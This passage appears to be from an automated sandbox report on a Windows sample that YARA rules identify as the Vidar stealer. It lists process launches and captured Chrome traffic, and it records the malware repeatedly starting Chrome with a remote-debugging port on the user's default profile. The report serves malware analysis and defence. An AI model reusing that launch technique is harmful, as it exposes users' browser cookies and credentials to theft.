                                                                                                                                          2025-03-19 13:02:26 UTC1390INData Raw: 20 63 5c 75 30 30 33 64 62 7c 7c 64 6f 63 75 6d 65 6e 74 3b 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 3f 61 5c 75 30 30 33 64 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 61 29 5b 30 5d 3a 28 63 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2c 61 3f 61 5c 75 30 30 33 64 28 62 7c 7c 63 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 28 62 5c 75 30 30 33 64 62 7c 7c 63 2c 61 5c 75 30 30 33 64 28 61 3f 62 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 5c 22 2a 5c 22 29 29 5b 30 5d 7c 7c 6e 75 6c 6c 29 29 3b 72 65 74 75 72 6e 20 61 7c
                                                                                                                                          Data Ascii: c\u003db||document;c.getElementsByClassName?a\u003dc.getElementsByClassName(a)[0]:(c\u003ddocument,a?a\u003d(b||c).querySelector(a?\".\"+a:\"\"):(b\u003db||c,a\u003d(a?b.querySelectorAll(a?\".\"+a:\"\"):b.getElementsByTagName(\"*\"))[0]||null));return a|


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          13192.168.2.1049713142.250.186.1644438048C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-03-19 13:02:26 UTC393OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                          Host: www.google.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Sec-Fetch-Storage-Access: active
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2025-03-19 13:02:26 UTC970INHTTP/1.1 200 OK
                                                                                                                                          Version: 736403927
                                                                                                                                          Content-Type: application/json; charset=UTF-8
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                          Accept-CH: Downlink
                                                                                                                                          Accept-CH: RTT
                                                                                                                                          Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                          Accept-CH: Sec-CH-UA-Platform
                                                                                                                                          Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                          Accept-CH: Sec-CH-UA-Arch
                                                                                                                                          Accept-CH: Sec-CH-UA-Model
                                                                                                                                          Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                          Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                          Permissions-Policy: unload=()
                                                                                                                                          Content-Disposition: attachment; filename="f.txt"
                                                                                                                                          Date: Wed, 19 Mar 2025 13:02:26 GMT
                                                                                                                                          Server: gws
                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                          Accept-Ranges: none
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Connection: close
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          2025-03-19 13:02:26 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                          Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                          2025-03-19 13:02:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Click to jump to process

                                                                                                                                          Click to jump to process

                                                                                                                                          • File
                                                                                                                                          • Registry

                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                          Target ID:0
                                                                                                                                          Start time:09:00:07
                                                                                                                                          Start date:19/03/2025
                                                                                                                                          Path:C:\Users\user\Desktop\random(2).exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\Desktop\random(2).exe"
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:1'822'720 bytes
                                                                                                                                          MD5 hash:5E941E7C271E85093CB8344FB7CAB50B
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000003.1130116827.0000000000B79000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000003.1152734556.0000000000B76000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000003.1171301147.0000000000B77000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:false
                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                                                                          Target ID:12
                                                                                                                                          Start time:09:02:19
                                                                                                                                          Start date:19/03/2025
                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                          Imagebase:0x7ff7ea9f0000
                                                                                                                                          File size:3'388'000 bytes
                                                                                                                                          MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                                                                                          Has elevated privileges:
                                                                                                                                          Has administrator privileges:
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:false

                                                                                                                                          Target ID:13
                                                                                                                                          Start time:09:02:21
                                                                                                                                          Start date:19/03/2025
                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2296,i,9997688068787143346,17471011568796092826,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2464 /prefetch:3
                                                                                                                                          Imagebase:0x7ff7ea9f0000
                                                                                                                                          File size:3'388'000 bytes
                                                                                                                                          MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                                                                                          Has elevated privileges:
                                                                                                                                          Has administrator privileges:
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:false

                                                                                                                                          Target ID:14
                                                                                                                                          Start time:09:02:26
                                                                                                                                          Start date:19/03/2025
                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                          Imagebase:0x7ff7ea9f0000
                                                                                                                                          File size:3'388'000 bytes
                                                                                                                                          MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                                                                                          Has elevated privileges:
                                                                                                                                          Has administrator privileges:
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:false

                                                                                                                                          Target ID:16
                                                                                                                                          Start time:09:03:13
                                                                                                                                          Start date:19/03/2025
                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                          Imagebase:0x7ff7ea9f0000
                                                                                                                                          File size:3'388'000 bytes
                                                                                                                                          MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                                                                                          Has elevated privileges:
                                                                                                                                          Has administrator privileges:
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:false

                                                                                                                                          Target ID:17
                                                                                                                                          Start time:09:04:10
                                                                                                                                          Start date:19/03/2025
                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                          Imagebase:0x7ff7ea9f0000
                                                                                                                                          File size:3'388'000 bytes
                                                                                                                                          MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                                                                                          Has elevated privileges:
                                                                                                                                          Has administrator privileges:
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:false

                                                                                                                                          Target ID:18
                                                                                                                                          Start time:09:04:24
                                                                                                                                          Start date:19/03/2025
                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                          Imagebase:0x7ff7ea9f0000
                                                                                                                                          File size:3'388'000 bytes
                                                                                                                                          MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                                                                                          Has elevated privileges:
                                                                                                                                          Has administrator privileges:
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:false

                                                                                                                                          Target ID:19
                                                                                                                                          Start time:09:04:57
                                                                                                                                          Start date:19/03/2025
                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          Wow64 process (32bit):
                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                          Imagebase:
                                                                                                                                          File size:3'388'000 bytes
                                                                                                                                          MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                                                                                          Has elevated privileges:
                                                                                                                                          Has administrator privileges:
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:false

                                                                                                                                          Target ID:20
                                                                                                                                          Start time:09:05:41
                                                                                                                                          Start date:19/03/2025
                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          Wow64 process (32bit):
                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                          Imagebase:
                                                                                                                                          File size:3'388'000 bytes
                                                                                                                                          MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                                                                                          Has elevated privileges:
                                                                                                                                          Has administrator privileges:
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:false

                                                                                                                                          No disassembly